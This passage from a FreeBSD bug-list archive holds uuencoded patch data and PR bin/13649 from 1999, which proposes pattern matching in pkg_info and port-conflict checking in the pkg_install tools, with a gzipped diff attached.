M,$N!_N7&(`B"2'^^B;.(:;UZ=UXK7O914B3=QJV9?Q;WY6ZWYFK`?3G(5]R4 MU_D.6C=E\8?X*4U1CHO^ZW*4S$,OC6@%#;O9*BKWIM)_(RKUW^#:Z`CW_O0]+.4L<#I9#::"S#SLH?Z7_8K@+/[[:/GRIO]EZ0Q[0K^7%WE[T!4\GDM6E<1;AM:XJ!K;1 MQ_VC@^UM.JS?NS0TKL4A]T__4["&5POWW>4GE5/L6XKW80>J;<YVB>$_;V;&_F]LY.L19L[*BLHQ+,')VV;G` M"O+$.7;2&3"/AHE$8L0@U%NQT>F-$56$`GP;4@&@I)-26!3R0V M"2&--`YW7^^^/1*0D6220K_1V; M`!/DQ<`'LM#VE16S*KX*<1V5[TX?3-MS&5HNW@Y@Q!A7)PH.,R/KX)9IBA_&=C>FB,I(/8]&N<2T4JX:GB$W122)I M)$B)3U0->X9BY#P[)DF2LL2X&/#K$6K&%WIZ^^[E&\2$T"=@?4>,[>16E@J+ M:QOD\]E=6X_7UYVX>%UM%HP83*/QD_M!\C!&U-$^`6J)$8+*KO84:#![\,`V MG(A5HYZE4K;M%/_X_$F(4J>XS&\=>PE]D27V$GU#DF3T>E8.WNQE9.(P72\5 M8C%YVR9R;M>#>%VX2QW5DW#"1$LUMM+TXS`]F#E/WWVZ\?G*W_732P<#N673`@RQL=ZL^<#/TN^J\0>UR9T)C@+ M?OYHT`K#Q]B*0R8EAR,^&^4Q`OU>03PH)2Y+5U14UMU0J6G6=YP)72(63"Q; MJYE:2D:ZYY?K>M&:TF%Y=.9B?'4[K#-;?_R/6M;?'W**11*!EO\F5O6Y'E2+ MWX^+XO=C9U$OW5=[>GXLD8O(&_EQ8$T?Y"T*1H\(G0S^BEPDUK)M=OQ`=5() MZHAC%+'A#KKE$!0'%&0+]24.'\705!C+IY^-H*YY(D8C8FR9$3@0HEQ,V/:W M`9+0>7^:+;7A+9F3(,Y5,S1@[D?L?;>ZU+I-KBC:G:`K#YT@R#R`[=&YW<_. M-+B1-873FYA]9,T""T!"_,U/42<'6PIZF^#`$P3R'2ZU+@E:A2V/=\;1'TLM M)L0J,J9=-GTF#!)GFP([;/5\N M^I-),@LI][X?/=N*HZ?P_S,RM^:TITA-Q$Q)9]CJ#D&6]+%W,6?0&8_Q)Y:1 MKL^V.JN]900O(NQQI(#T,8.IVB-O*/0/G2D"#5436(I[4WLR/(=]94G=PPA6 M"-N;73".""*NG*$UVCE=^9+S`13'B1`U*SD4ZA*^W9&-6U]LV]TMVG9W(^DV MG^TG1PILD%18;$-F)0*_HPE8M'I6MU+&Q M:(Z:`XZ9AZ$&9TY;H[C81;7L_!ASD2\9W:H+7`_[?I)<4JNM0*X_ M2/6$V8"!D$O^%4*@47(^[R=6;11SRPO*?RW]V12ICF+-.AM.!O2DL407EQE! M%M%%>7+J70[Z6:3.@BQY]A'G$@H3NH25T[@ITF%](B`(),+?-6]@$]?J*(#4 M:O4=FDSP$%W')A,Z'];JY!!)&>N_S2$)OD99WGW*F_R9#%SF[7]OO^0X+[F\ M;_;?<"YS-IJ8`))<78"42 M%1'/;U>(GTO&S!94<8WB$=+?\#WA(4.-=`>CU;TW7E(E=7YXBU3#4I>3@)C\ MHHR4GRV>GK@"D(SGM=*O);HI+";>\:[8KL9PD$D\+)\;C&&,%;`G4&%\ MWN6GI#0IP[`P.=T7RG)J13'[VE\J7#L&!!#>T.K'F>LS5VGT"+WTU_%,BK MO>>C^=A=[0W=I1XR\X>/X\<]C&RZ%C_HYH\'?"Y!O8,[E-")QVOO04##NE4# M129%R-S4//<&,]COMIB!PR%(G\D0I]RLE;1FSH:.C57%7,_85;:+=HC>A!3F MB1B)RI!HB(C"3^!-M,4NX#&'B\TPLR/E7<4*?EQ53=*&'SQC>Q^N0`1 MAI0F]DEPCG5SQM/1H%]?NW(!)2NM%\V^\Z0L'?:1TG38+KX6!;3':N87Q`1M MX+%YIN:*.M*J<7C+79E)?)MR8PEB=__0%[U=/ZR=LDG=+TLUIL8FE;?!LDIX M!R]Y@]MP2;+L@25O>&\K>4';5FE5UKS9O&`F7]X$\.]_YEM46L"ZH+N_3U", M4E]S8A7?GT:-[[,F-'Y.":W8H&E40BD=^V0T=+$"`*.N&I%_I2Z M502]6_4TERJJ%TMQTX*3G.XXAOWJ,8@HYYIPLMP=ZM>I7]&$DQ==(T9DO,LP MF$M6?0P1V?WG\%([`V81F[LMEUO<$6++E1WAHX#IB#L-?/6.T#Y0V1$^8IB. MN%/&U^Z(\KBJKKBCB^^,/[W<80[H#M,VFRPS]YM+R2Y3T<5;2-JKU'DAVW\@ M<#,@T=V&P'M%1=_E'.=HFS_*W8'`;O.I:,J?REQK50>S.[2J&UM%H^XD5QAA M>)B[0XNR8U8TJ*>_0GOA`?!.=.6=N)*L?&)T#2X^--[4L-MBE5PGK>2ZVC>B44()>&O+ZRK[69;,YCE` MBB)$Q7`^':6YM$DR/SW!-`H>T\.6'ZS'7;Z=T3LZ.=2X"VL7!@%#9)%%%"'T M,+P%!7CP4QC5@&)`A]#HF&6>H@5!<(97/^_`E?8D<.5F)[FA>LF=D#WGSHO= M/3QS'Q[O'NZ]_;F1G:BS6[/I`^OR_>SBTK!<BD365)8QLX0N.E$*.J\3Z4,='C2+". M&',=IXX2'U(IL4![UH03:%VKM[8>=[P!L[7QK[*+5N=99]ICH[9Q$TCC449J MG*&+F=6N:20JM(P9.EXC9/#F187(6[X.UCDT!M/R@%L8$TXS!Y&S9*I!ZQ$W M[]$&HZ!]A\_@G?EO.;S`YR888GDSPB!;7FF%X/%\F6UKH50%X>VM/4`G@AYB MU#SVQHT:/@NRUU\`@_-QL,P;9YA2*$*QO0-_91TO&P*U:^%'JI5^)88D"J*=,6LTD=-\(29JAG'0%*2R M^&%\W#(_`VI%DI26E2W/?USY:!W^:`_6W$?3-=0UZ)OT*0BL$VTQG?D&38(% M$=FQDN?T]TDT"!96OM=FVNIW+8YAP6?-?0FB*44,OO>7=KPZB*G'L>WFP3?V M(>U*PMF5?0588F'4TQNI4:CH.C`)D7=BO,8^/;T'/0Y:\=CMW0S1@AK5T7Q5 M-G/ER&T,&'-,Y@BS3\DQ$4J&C,&:T/SEHO^G:KNM4PL'LFLM+B_6Y@NKL+:> MXV02(WQ*%$0\75\W?A:0A6>HNKH:P[?AU6PT3S`UCN!;4&WB=0&_F9&%8JD3 M20F"+^(*T,$+U008*F?$U@^<_CW&+9DG65V!?\:$@]ZZ:S7C\GKLMZ7A.+^) M8M?958"#%',Q8X2`T2;SY!@&_I\`D)5>0] M=:O<,(MH:GV_4_M%<.E6:`Q5BO$L))N/Q&,CBUO1@$ MM%L$`>WR?3-)X/2K1`!_6'/E40"WV4J,MTG^[JWGHR8\S3[#`$`BRHG0F(Q' MIJPDG41]2&Z%R?0QV+P`1;K]_F"6,HJLNH,??GCY]QU'K MT5J\L4'=@F)'8E$DMB11G<&XZJ5(?Q*)".5&,D\*FZ,82`?;.[O_/OYOW%AJ M=9^"(2'(2(!F*`9'DS!"_M*?+%8)F8>M%X@<,>4G2P)&`D;#G$F2G&9LTM2G M:&_9Y\F`X1/%0`+25E<#0Q5R!J2&O<&!G!?".Z4(+]UB0=KQQ@4!@+$S$;`Z MQJ`,7_%;A5L<*KWB0,D4E.6XP\']N=?[QJ'&)2@HE]A65Q$'BH2XJ-F*6=ZV M^GU+%;G6#=3\P)>`-ZEE2DA2^7=3)N41?D.BO&:_G*!5/YE4S743V]3)(3%@ MG:$,0]6?8.BD$"#5V;?H88\[H/!+82)"''Z*8>?BBU,O<@C,#R:H>]9%?_9[ MHC>U.B@RKPG.EK9FLI&92@AW8WE3DIUZ0-YYJ/P+LY+M322=HCRR*L-LTE'( M*5VEF-/G"5D@F'L1,6`2O*>`1#C+:;V@`%G$W]J*UF/Z*B(< MY:%;V$C+@'.A6?(&7L46<;O@5:\G=A`M\Z&=VS5["YRS%[6$W[/B]J8*(B;8 M'88<`W8!B M&BO8UA8#WU]M^DA1W@J\J2%S:BLL\HJEMI9C2=?D8@0+S4:Z2N`+7&]H["WO M6F7O//Y".AS"XJM=C";'A%'G/;`(;\'\AY'CCX%0F?I4#90^*].R_""\S_$6 MPA1Q)=A="HEWJ#`P/,((AGB6S(]/^]FY`GWY2%L<`H<"\[0ZZX\5ZIM'"+F/ MQ^E5,D--M1FA$"X(0)Y_Z;'$"CZH+!D?D_'@\^1A[ M5N M5$E8DL589>7SN-DM!VK7#DW-'D6.ZE"T3A>@JT8'T@\'>V_2+#^_Z"ALYB'F MW('/]M/G]_WY>7$RVGROD_E+`<`OHT;E"5H_@.^#KYY7$ATG*URR;;"[DAS% MG'C-CFBO/'K>+_+M[=&T! M?[M\$K=:Z_?)9$^B;A:TUT$^$0*+&#:X`_\$N6E<&6(+P9.JE;U,K4O92Q-HT;X`%WOIPFC/3VG`0(2L/^2.KGYM$BS>6NV5$S)E0P#(!&R>T6@'SK2L6@54K1:K*6E)\,(JKG$PXPCF0,YWU M0=3GJ!?HW62"FG.L`#@H)'@%C:&$/Z>7L]\F]:5VW<11+U4-T)6="T[+@;=1 M']B';4S5;EP3#ABQ+?_",?]G]8XO?<4MK;AQ>4P&$]2`NW\4)6M1^PKDE4VE M0YI7W%ORKH&*,^5".$'=HNHNP),?8-QXFG!$XR=N]#%]:I?ZAR2CLD+NYDE. MS?X"642%1.@D<7HL)?;.9?+I5:9C(WD%HQSR8D"!7^26#MZ[+#"84!RKA7W!`-1#8+I@IY;49.7V(^'B1 M*H2R!,8R)T2V7-PG&VJ/L!AV0W2L\E('+#4"0RDQ..B3D?;HYQT MPA@@9..`<_V+7$AG9Y?(;C/QYZ(NJ,I`RF?%=E7HP=PU^&L=LNJ#JU/TPC(^ M5[5.37PUZC!3_$OR]#$O!PL*HC&H>;L?OF5C47@?>AV9'&B08D0>@'L8&L2 M#OCO8F2`&<&,L4H5?B/\@GG=O.`0%H+A$&A)';0[V<7&,- MT437XBY?A3&<$=$=&)J*%.Z\H]1G53TQZA7X1S$9*1<\!R>_J!5UUSZ2MKF[ MAE097IZ>L<1ST?\3L]-=N`;B5/N-&-H-49$&X6/FS:1$E("JQ'`!$T,0PK_!U,*731E$,0 M16(`0G(HU>)]VE:H#@>#Z!MSV3/,#B1\B]!I48:W#%#=!=YVHDX'3H)T7F"' M>*1EK=9J9W>4E(2]='')P;W:HVVUI-S^ M#>5D0RZ6Y*UY<6':JTL:Q4U[<4G>Q)87%Q$D&)I%D9N MF"Q3+"K+AXFZC6%+6:0Y5L7"2L<12+,RRBRGL,Z#T$H858`X*6PCST$_( M-N&I_0RD?K0C\TUR6HRO.6R89!7&9>I4:#`IP_?6D2"L(RKE:5X:$;29H5P+ MT`%IXV'\J`.;X\9&W'W@KGV6V/:I(#HAM'*<.H#(`4(T]12$*>H';I" MTW[-YKSBQ\M^PC,"+@X45%^.+ MC4Z&:7G^K6R>Y^W\N[ MUU5XSY'"H1^EDZ0]'T>2=![0:4]91VCC,%';NA+];C+5>9]W>[WS!S3FZY MV@,7M_LU$/JSY>JWWFSWJSYP7LLO*^^Z=E_B6$^U`FV20,7Q3Q3AT+5IF.WW(@5>K_N=5ZT'!4H52(NXQ(0[BKXH;K`?.3L7F*KF^(CN5 MKG,865'GWE;A(LND"))F>+VE3L!Z.F0_)3$#H#DRQ:C0'+F`8)C/]8S8(PA6 M8!\"P6H.GVK]9UQ]3=5BVU=>L]H^M"HL`#&?L;D@VZJ:BQU/EV;D1N:?YH'W M;R-CQR/R`,/*-`#[5FF`0QE0?;4>GMQI66$9Z@]EA4'6?QRF:3UJ/U-"U']D M",>:?P[KH=CM#;$[;>!&S16V$&O8=WH>F=Z)ZGTPJ.PU22VH8Y?;](OD`EVH M1Y/(4]7'EPXTQI"5W.#BB(DS<(8K%..=T?NMHF&NMCQJM)*W[LPZJD'/NOYN M_@:/8/(B[\:=7M1Z^,C8]V$#%1:KZ$:6"[Z,WQK3G;(!B;E"WVVYO8RZ&WR; MCW2+Q%>5N&AP)%O>$##3;$(+;LM];2G56.$?W"CB(;$U%*5B6\#Z\C6OB%.< MT]OTR4[TW0G;1C5J?[*.ZNBZN]-#I/2<7O*D*%.'9.Y`#^9('_ MQFERE7Q.I]XGYO51+#^VY<>>INQMXTVQ*V%NBZ<5_HDS>$^OW*2 M$^P&%/MA36\,'$8%2J%]C#Y\75Y,^K;2P0JTX"_*U%G M#90F=Y(*2S7ZVVO*9X<`UR$"6BRO0P=:HDAAZZ9'#\W/9]?&X:)PN5>>B(6*X M>)W8PK&2X)ZO+("`SXPQ.H,$Z$'YI2&MC_KMZ M=W3[3'[HS2=8CF(4#`1]6T*P::R"TLV'I&\-6NQZX+='Z&#;U:!50-O0;0I< M'&106B&5HESW[4%<8M+$?/V)'X!N)&%139R60NJ\4? M*S7?]3+6W6Y3N\*/2EORU[#[/?'N'Y0SG8K:.&7 M()(PBGQ`%&J9YB`5-QO2D^<3S$$D!ZW\+U_DM;)A7UWP&`-WP^*6 M$_+6G82TKCE"TQ`,L37GM(4?BA@SG3QY+6AP/EI$'3\@)7+)!Q7&HVLTSPQY:[V)$=Z3 MBU'E]^)@=N=>:+L0\KB53\G,/A>#:1JV-:E@61PR1;M8?_JLSDRKA%?9`2*? M>KH,A]AH^=D]V)5.&U82R+PA_8Q,E?Q$T>H*%>.&:&;M,Y(3&RL-M[PP=8M2 M7V_#3OGZ"+?1TO=[^'[O2"I&@XDMOS_C$K2;+Y='C`]=XUP,?0>IY[F.VT/) M8&J/4G@'B/)M5:AX442P=@4S,]$<-LG)[\4\L+Z[[7ZE*>P*=X/]?Y\O7M_O'[[8/==Z^8 M>B6#"B+Y?/5A<>W_R?[KQT4],XO.MFG6RX(F.=BMHYV<(I&O MFVK;SW01Z#E5'<1U"MI)G&^-YB`'\4CZ\.7)%8#P*C0CVD9(*!C9W+E=V$U` M!M"%-4[FRUETGD[I)F:&OO'I9(SQR!/T6P9F]V8G7(09'/3QRU"$JYBGN'A, MFR6YJG-ZJ;70Y;48DUW[+\ZONMR--S;->[5H'Y&;U@H:,K308P=KQ-_AJ<*) MD';'P)R0AE'Y*/8?1OXCL9?JR4T(]<7H:U1G)+CQO\#2F\%<:7?"62&F)0VZ MF((S\*DT.I5-*C>BDMT*.1+>P9P>RSW`:EVV)]A'2]]K!G,6R-V6&='0D=[7 MT0SW.QJ7H>]GVU1_>;?/W2!-Z+7M`:!)[4MQ+X MB<_/#!R#<=E&P%)PZF11H_XW!JY#AO1<9S1A/7IN';/$ON;G;J4#=,6>H;'R M;)P\O4`Q.T?_\L_1>(0>/`[\0((DGGPN1QIKFB[CCO.,"%T,HEA2]G@XN6') M87_SZ\L(R!VT_^TZ43?KE`E:1EK+NB8#UACD\`L07Y$W$1O"XB1V@A0V^OH( MI-BN3$&Q'>;JBBRW1'XB+T,DAMN!W35"'(U6@47)_&$7/GPX'YV=0P%RV=1" MC>^:;A?*,<)IBJ',9JB^P6IH'H:A(LD7K==,3IL,&P0,FD[M,'RW^2/(Y:?^ M:(R^A:O.AQ\O'6YTXJ_BGKE/6*:WX=?X9NWC%EL[NP]3C-!(\1.5/51,,KXO MQ)/UD@/_!+&9FZ"#-+02W&.(YAF+E7[-W*HY03Z0M>E:#[^FZ&<"DMT7C8#W M%+Z_&2>Y>_@I/99<9*>G< *_Q]>%&6DQ>0``$$N ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 19:20:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8DC5515997 for ; Wed, 8 Sep 1999 19:20:14 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA45523; Wed, 8 Sep 1999 19:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from spare.westbend.net (news.westbend.net [209.224.254.133]) by hub.freebsd.org (Postfix) with ESMTP id DBB5814D42 for ; Wed, 8 Sep 1999 19:13:13 -0700 (PDT) (envelope-from admin@spare.westbend.net) Received: (from root@localhost) by spare.westbend.net (8.9.3/8.9.3) id VAA58251; Wed, 8 Sep 1999 21:12:25 -0500 (CDT) (envelope-from admin) Message-Id: <199909090212.VAA58251@spare.westbend.net> Date: Wed, 8 Sep 1999 21:12:25 -0500 (CDT) From: hetzels@westbend.net Reply-To: hetzels@westbend.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/13649: Conflict Checking for PKG_INSTALL tools (4.0-CURRENT) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13649 >Category: bin >Synopsis: Enhancement to PKG_INSTALL tools (4.0-CURRENT) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Sep 8 19:20:02 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Scot W. Hetzel >Release: FreeBSD 4.0-CURRENT i386 >Organization: West Bend Internet >Environment: >Description: The attached patch adds additional functionality to the pkg_install tools. pkg_info can now do pattern matcing: # pkg_info -e cv* cvsup-16.0 cvsup-mirrot-1.0 This will also allow bsd.port.mk (with appropriate patch) and pkg_add to check for conflicting ports before installing a port. pkg_create adds port conflicts to the package. With the appropriate patches to bsd.port.mk, a port that has the following in its Makefile: CONFLICTS= apache*-1.2* apache*-1.3.[012345] apache-*+ssl_* will result in @pkgcfl directives in its packing list. @pkgcfl apache*-1.2* @pkgcfl apache*-1.3.[012345] @pkgcfl apache-*+ssl_* >How-To-Repeat: >Fix: Apply the attached uuenoded patch to the pkg_install tools. begin 644 pkg_install4.diff.gz M'XL("%S@UC<``W!K9U]I;G-T86QL-"YD:69F`,0[:U/;R+*?Y5_1\;D)-GYA M&P*8RDD(C[/4$N(+9$^VDI2O+(^Q"EG2:F2(=S?__73WS$@C/PCLV5NA*K$M MS?3T]/LQQ+M": M1%/1"KT[V9*)UYK)I"F'?MA:O7C]KI2(-/'%G1_>0((?TH]":#<[NZ61/QY# M8P:-A'Z"QK;1:.BO3GM_?[^UM=?J[,%6N]?>[>V\='AFK58KCJ%AT-[K[71[ MW:W2FS?0:&_OU_>A1A_M?7CSI@0.X)\(I`!_#)7*I9A&J:C"BQ?@RP^7YY6$ M'^`VJE4<[.`7^` MQ(#832<\#]((QK,@4#\V6Z6:XW@3-X%->5"JT9J$V%A\]64J*YMN8JC=C!TI2B^QMW_$[:J\`<-HR&T\"\B&492J-7B MQ`_3<:7\09)X/9>\D^?R# M=XN)M$L&,$]*J0(1"HTA-?,\U(-1WA(`A0%U%PI M6&^0-&ANT"Z@Y(WFH*F$0UP)$JD)$H[T094CH$$Z*E0:F;H128-RAM M97I[<`?#S+@%2_"KVJ3FZB$=;`?,-RZ_D$@4;5(Y"MWD3^J M&N-'+^H*!U8.Y.,L"6$+OW\CXT5+L^!I'E04O$U2-I3H/YCZ+W>)^KLOZ[M, M?/KC8:@J\UB$2Z3/!HBO:>)ZZ0#Q3D68RO4C-^^1?F*01J@AZ33&__5<1#0? M-!HB&?0T`@6;'HFT?D*L]J*1^=E'Q4-Y/4>S#/$!;V2O6]^#VGZWWM[+=J+% M9XOLRL;GK0T]VS@/M<4ZG/J)3/LBK&:+]5 M_L__&AR_/3Z[1*OX&NA5#XY/3@?G[_'YV25YD)HV4E/W5H"<)4*#PMW/4!#F MH%S+,Q:9W"+Y$@=5>&@5_OP3Y3/PP]LTRI]6E0WFX7`GYS(5TTJY1;H^O:45 M&C$TIK"[LX/&%VV3GL63V#@ER==*NP[E8S=URDWDJP1!3;1/9HMI#<"0Q*7C9.$`4_''H58A:9EL0H'E#I@*:R3 MQ2T6._')-Z9P9ZM#%.YTM[2C6,$PK;_,LF5%GS[JT#\_N[H>D"5A^QXW_LG,[T'9#:-P/HUFLGQ@ MF;TK%4_(&@:'_&Q&B#19''2(K[X1"\URVV$8_R;O4S0ZJVD>M M!5$R4C%2%M.4"VLXY*YQ M-VWZSHR7,P^C;WG`.A=@P@`BC&8W$^;N#2I9$DXQDH#[*+G-+#WYE5J1P"N" MLF@,,[DZBC.NY`\'Y8Q#C>%LO!BLZ#?9K#7O55:HO"YF5*CYB3=)*GK7==AH M;""SGKT",F]58\BU^<%E"SQ3&1;B(AOZ::W]Y=7&YL;J=QU\QR&,#BK,'R>H M*+S%M$ZQG)=<#C[K^4;M=$XSO$C9#9OM-JMS$.Q"NP_GFF)BB MMLA[P@V5*R$?%8X#WZ.HQ-@VN8+MM!@K."MUURFQ%*H=+SYJ4 M+T,F6-KV5#4>2(][5_:R36H:L2/)8T%,_EI6\C>.H/%;;OHU1-P[T_XA,=)C M'R5*1NBU,!TMRX_E]$J8V1.OD5[83]]QH2Q MI0_TBK6:2A"LD+26V>:+Z%YASP6!6*4/0"+!$K+D4/X;T8$EV=$.:I7H')_T MJ]H9YJ(#1=&!]:*C$)>`FOJ@V#088B8;N40(E1Y8XJ#DJS#\T:($?YLL(8W: MU2R"4RFIFTZ*I,54DFLW9&[9$^TO%5%ER0G],^MDQ.]O#X>/#V M\.JD7*T6"DLF6E8T9@F^O8%Q$DTAB#P77_A262X3.1RWO#W(6WABBR$.%T+DPN"XX[&N$H%AL-%>.3R$S&7&GB MV,7`>L1[HEG(*10`BJ8(,NI^$GE",*7=<'[OSJN\%&=@9A4EN!R!*>[N8N2Z MA^S=[M2W=<7<*=@ZS>YO*E!O6,7@O*BI,R[.3W)5-4&*2E;,ZIF4-*Q*[JD? M^G*"=BW0HH+<(_<-I]=])2NVG`3 MES):R*;Q-EXC86FF4UC,L6G66*!.P\F2C&*G(9/(2GR/-AW3\7RQ*OP)N:`V MKM9(^>).S)2')<.4Z[]O9NY\E^BKS(M5:R_FB8:=2MD*25\1+`5:!);#.0U; M5PB^5R(H1A]/+A98=8)BH4#QALB144,'V>Z=&`V.9DF"6!\H(E%QPZ-:5$N* ME.H!-&B`'D56T'HJ\(L0^E3-QB3M@"&,$U0_FID(F4:)F6S--9\YZ!<%5"C9 M+@!>[F,\4?-JB\:YMF"DFJ8]QMJ*(*O01)_X?"FCK82Y7SYRLYVCV M\$"V=IB2S''^RVDLUWJ-%0V^ETZUU5M70H!1YP MA[O<+),I?O<.+:(QB-ET*!Q:.#Z[ZI\?_JKMM4%O`51AD`6JQOK,YQU4&7,I M4U;%"*&+Y:3;JC[GS;T`1W"YAHNBE,*+Z9`KH?<3M/CW5B6`Y&^3NDPXO>*' MZ!$DMY!NJ*^!D44P\MS$JOO.J]G:'S]^S$#K=I.IU-XS3A?OK[F;%46C9TJ& M'IO8Y^GD`YF[8Z?M2W$TY(9KI218'@5C);O6NF3,.#31P$S3USRQ-,I'^U(H.'@U;E:O/"JN-\_Y"*P;)JIW!% MI+(ARI-Q9V`AZ,HCQ30+X=*LG)M38J.UD<=XNHR;UMKHP_1IE$+TJENJY7^S MT(]\#!EFB.4"W7+6%^1D/K%H]'Y5AT#1[>UEGB6ITRHCM MD=FO[>QGQPNTD>]EA3E=[5NJRAET\FHL*_HV(5VC%*W6SB>U.U"CC,?3S*_\G-' M;6AO];:V>]L=A^?S\:3E80O'D]I[.]Q;WC,A%Z9T$$=^R);<333#I'I>RMJD-$OFYP:Y^(9J0(=#3'N1@7#BBYN6 M4!'-FV8)FA?34D,?,DCC)BG&4(Z:47+3BF?#UBG^?GMUW#)-D18FD$$@6V@C M)XUVL[W=W*8B9+59JOU%()WF5J?9UD#@(DJ1LW`VYBW>8[Y*_FV&$2LTWR*# MT.EA4NG+$I_\\/59#MU5?EGO;$&-/KNJ?DG(X,2K"5R?'/UT<79T>(Y>Z_KP M[/R*=VXX5FJ@Y<3\*T'227\:!T3HL]105X)PO8EQJ!L2RK9U*>/LD,]N\H$, MU&P4O1MZJ]@1)7../B6UE-)ZJ4$A//(FA&2&?$@G"3>R^,!A1,*]FP29D6R8A6[_G&NVY=L@'IM=N%0RV^*X$B]C""FQ9 MF_(#<:P%4L]!A2U#?6X3M2.AK,0=9;:W$((HT<#<$Y3D2QK\V\Q/UE7C06RN"<7OYQ=OK^@I+*$3DO`G1O,A-X^#CFY M`[(R_`T0A'MN\#MR3A*4IG[*Y):Y.#:E7743?#I9&)"`HT;Q3'\5:*` M\=E'JAA[48#N%_=Q0J)*0]"-TWE=2K!IEFL994I#FKQC+136._3_M"`*@,_% M[!*0Y_(]GR1G2,(.)"WS!7!U8KOX6A@))":!K@KM;:NJ4,;,?EQ:3_2,D9P= MEAKZ4"+K#UH02M)<4N$L\LA.UR^9$ACITZ-(ZK\##"K-2(S=69#FLS!R4%S& M#;1&0XH-H?F=/,!N)4S25!PNO MWJ48+2X^[+-'H+Q^\3&ZM<6G;V=^,/I%'3E:^>XL'$<+*_0QT^F+\-.7?(+T M?Q>#U+RYPE_Y'(RFG&/!]W8HVBF^X(3R?1C,#^Y&_?B7K_G]48]OW?6N^W]W$MZ:>]C[[@W[^2"[#[)R M_J4![-RXW>KJ*9ZUOCE1:,ZA\IV;$.$.OH?J;KR"*4S>Y M65B#Q;ZC[B]T]XO(*8ZNFYEC=\38.8K5UG!\MH37:\9+.W*#(A.MHKL;[9<= MO@JZ:R(6_99N):EJGZZ\R10)H=HQG\/%?W0BI,PS>W:.\:G!*OD%O_3Y9B%] MBR%F&M'W<9;5TB\?(PPO\>/T"\.#I;]/C3.(S1C\=0NC_,?/$%N_$DC,C[7` M4NY"HN0)FO$1W1!K(=E1>G!,Q\JHBJ<>4+]ZW1XO%S=Y!-YW]LO@5F&54^'1 M^UT+RZ+"$[=+C?25(*VHE]G;/"<%ZX&Z<,4'[YS9SBH$.= MF:5=/&U]J;N71+%L^9YJF]Q/J'I;@(LS^0R/3!/,`RLOU#LT0O`YM=KEM/RF M.F6)5M`=9?='8OO^B#H>KL]3UIR'D2YVX;D1H.>!/AK_E&V;WK[B1'X8FLH: M<)5XU)"@TT2)/^+J"^;4=:"C+IAJA]%]X;:=&JZZH@\@H&YC=>@J9KNS9UP- M_5&A98%`2LRK]AT:[(%AO)(#3PCKL9??<(F7,Y"&$7WZOXY MXTH5'YG=$,*TF(P0D9K%G(H\$@.,6RKJNOPN@^4JO4%,FKIJOL]WL3J[UJ5= M*N!7=`1HM(^?':-YM!\4B/"4'MIDN8=V??GAA,]K7*FV'DN,Z:AUNQQI=W=, M\\^ZNNF'`VZ?S?09Y?RW"GB>T.B:_.5&E[&LF5?](>VN%5BL;WIM%9M>6U!` MWO2]S(,5K:]MAZ&8UM?RR,6:`#=P\7]UK[)Y@0H)L]0/Z"H>U7,8`K<1HG'Z MG^*^O:F-8^G[;_$I-CJ5(*$501+&-AB['!ML*F#[`?SFO)7CHH18@9X(K:(5 M)D[,=W_Z.M.S%W$Y23E5P=K=N?;,]/3T=/_Z&C6J3J<#\VLV.B4KT(P5C$<@ MM'PXVCN2.ZS5]]-H=QR1M+;4\D^'YO%5]'+&4@UDXEL2?)W(BA>X()%#V`4=>GZ#3N774U1 MT9BM:]'9_,+O?U`K7FNY:VC9"Z:KQ%9-.55_\PB2)^IF5A[.6*O MMBR[NF30`M)7PIXU3[(I^JC#!M5G1245D0Y=V82AE.;WHGR;`.)=:5$@,\Q!R]1%)`4Z807G7H_&8K@96 MZBRQ=UX'2NZJVQ15':NRO'C_1#Y`.FSB'JG:<*&W'TE90?"+=IK6ZV0PQNG= M]S.2KI10[T]3TB:64F.<3;0Q7:?^0@177!]&SIW!,]VY,S3)HDMON9B$D9+K MC4':)FLU[()+RE812/R=<<7]1*EZ>P&G'W]3"7Z\0'COA.8,G5Y$C26./BX5 MV9_6*!=Q\G%1W_5T$SZ2M/`T[H$T!O]TUM="E=!^;%P#Z,G),MV_,/&);HC-HO%S)47ZPJ*'X,T)&D18/!)\$1$42` MV031`C2_]MUU&GWYUU"JEOSZX1-^0'LT9WY,5HS<$:PAYD[!SQ^PB2YCU$)X MBRU)*M!9%S-^9!,W\DF0@6F2$`SIZ7NK)<4.6BU?\XUM`5%GA"V`3*/HF:3' M!\U3PUY/T'CN!QE%Z(^C';]"&([!`,Y8JZL_PJFG)U[%T/SMJ+=5M(&[:WD_ MY.A(Y$!4$,(`*?W:=.9T@K=34$;M7AD0,5P7M"+(+ATO8/NS\X2V8GK3AF/, M_UYE:OCI;#MU"O"$DE9;J\FKB9MP33:I]G[::H/'::C0.A?EBKCQAO320B&- MI*LJ,NB.H"5I^3:_'13O<4L^VPC;(ELTD`^$*=A41QDPNED*XN`D89_;X(X3 M=@-"F"E@)T$R7#`,CT3JUY7/TX[B)>F+KN<60H;GEVS93B0.9 M%A_J7N\=GAP>N.O?"B$CXFP%!C=CA6W#W=20R\^(Q0C#R'*P189!(0;4YVH6 MA%\CMT9AD0[((0K?#]S$EP7<)![BDWJ[5Q[E=ZDAO9("*4_R$<@89^DD\7H# M[_/@S*91A?8L*?F'FJE&Y=N1:W"^F-H5\>V_@W+KC/&[\'%N<[>CP%3<&<\V+%=XLS(W4]=EY9-'ON$AZ MP@+YM=?[1+0(#/]Y_W'^+MR(%_+O)E.AZ(G@/1T/7C_:14<2+@>J*7@7YR81 MY(&-1/1K9$V#NITVIH2O;IG133BJ$";GA+&43M"TO0[5;8J#]I:!^,!Q9C$H MF)!5:SZ#X\W@PI%48!SP]LI-`[V-XQF7XTQZYV7S\!30;,$4J,X$$T!SN#E\ MA[J8-6E.['RKM2@]3@9-K2B"DV`"J/3$_AQN.DBC7NB/3:1'Z"RHTV%,\%0* 